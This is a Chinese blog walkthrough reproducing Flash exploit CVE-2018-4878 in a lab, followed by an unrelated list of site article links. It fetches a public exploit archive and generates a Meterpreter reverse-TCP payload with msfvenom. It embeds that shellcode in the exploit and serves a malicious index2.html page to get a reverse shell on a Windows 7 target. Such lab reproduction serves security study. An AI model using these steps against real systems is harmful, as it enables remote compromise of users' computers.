Flash 0day(CVE-2018-4878)复现过程
一、前言介绍
2018年2月1号,Adobe官方发布安全通报(APSA18-01),声明Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞(CVE-2018-4878)。
从Adobe公告来看,这个漏洞的野外攻击样本最早是由韩国计算机应急响应小组(KRCERT)发现的,而KR-CERT也表示,来自朝鲜的黑客组织已经成功利用这个0Day 漏洞发 起攻击。
攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会 被“远程代码执行”,并且直接被getshell。
二、本文测试环境
攻击机:kali IP:192.168.44.128
靶机:windows7 IP:192.168.44.140+IE8+FLASH Player28.0.0.137(及以前版本)
1、下载CVE-2018-4878利用脚本到kali机 wget https://raw.githubusercontent.com/backlion/demo/master/CVE-2018- 4878.rar
2、解压后如下图,可看到cve-2018-4878.py,exploit.swf 其实之后我们还是要自己生成一个index2.html的
3、Windows7 安装flash插件
三、漏洞复现
1、先在kali里面把cve-2018-4878.py的stageless = True修改成False
2、使用msf生成shell代码
msfvenom -p windows/meterpreter/reverse_tcp lhost=your host lport=your port -f python>shellcode.txt
其中:lhost为kali的ip地址,lport为监听的端口
查看生成的shellcode.txt
3、将生成的shellcode.txt的内容更换到cve-2018-4878.py的shellcode
4、在kali下执行cve-2018-4878.py,注意要和index2.html,在同一个文件夹下
5、在kali里面开启Apache2服务,并将两个文件放到/var/www/html目录(apache web路径)
现在,kali上的web服务已经启动,并且已经有了index2.html这个web页面,我们需要用靶机win7访问这个页面
6、kali上开启shell会话监听
进入msf,使用handler监听模块
回弹一个tcp连接
设置kali的ip,监听的端口号
启动服务
7、使用win7靶机的已开启flash服务的浏览器进行访问index2.html
8、回到kali,已经进入meterpreter模块
9、当靶机访问恶意的index2.html页面,即可触发反弹shell
四、漏洞修复
将flash通过官网升级到最新版本
或者,关闭flash的使用
最新文章
- 07.LoT.UI 前后台通用框架分解系列之——轻巧的文本编辑器
- python解析robot framework的output.xml,并生成html
- 根据Request获取客户端IP 内网IP及外网IP
- PHP 对象 “==” 与 “===”
- OFA &; OMF
- sql搜索数据库中具有某列的表
- 如何从Apache官网下载windows版apache服务器
- Lists
- 在linnux下,配置自动备份oacle
- linux网站推荐
- Lombok 安装
- 第一章 02 谈谈static关键词
- Poj 2255 Tree Recovery(二叉搜索树)
- TestComplete实测Flex
- Python HTMLTestRunner生成网页自动化测试报告时中文编码报错UnicodeDecodeError: 'ascii' codec can't decode byte 0xe6
- IEEE Trans 2008 Gradient Pursuits论文学习
- 09_Android中ContentProvider和Sqllite混合操作,一个项目调用另外一个项目的ContentProvider
- js中this最简单清晰的解释
- MyBatis Plus:No qualifying bean of type &#39;com.baomidou.mybatisplus.mapper.BaseMapper<;?>;&#39; available: expected single matching bean but found 4
- GIT仓库如何恢复到前一次提交
热门文章
- 将Asp.Net Core3.1项目,使用Docker 部署到Centos 8
- C#LeetCode刷题之#342-4的幂(Power of Four)
- Vue-Router 基础入门教程
- Node.js简易服务器,配合type=";module"; 实现html文件script标签 ES module引入模块
- 谈谈BUG严重级别(severity)管理
- Typescript node starter 1.Express Typescript
- springMVC入门(六)------json交互与RESTFul风格支持
- 从《三体》到“中美科技战”,3分钟理解“网络”D丝为什么要迎娶“算力”白富美
- IDEA的主题配置
- GitHub 热点速览 Vol.34:亚马逊、微软开源项目带你学硬核技术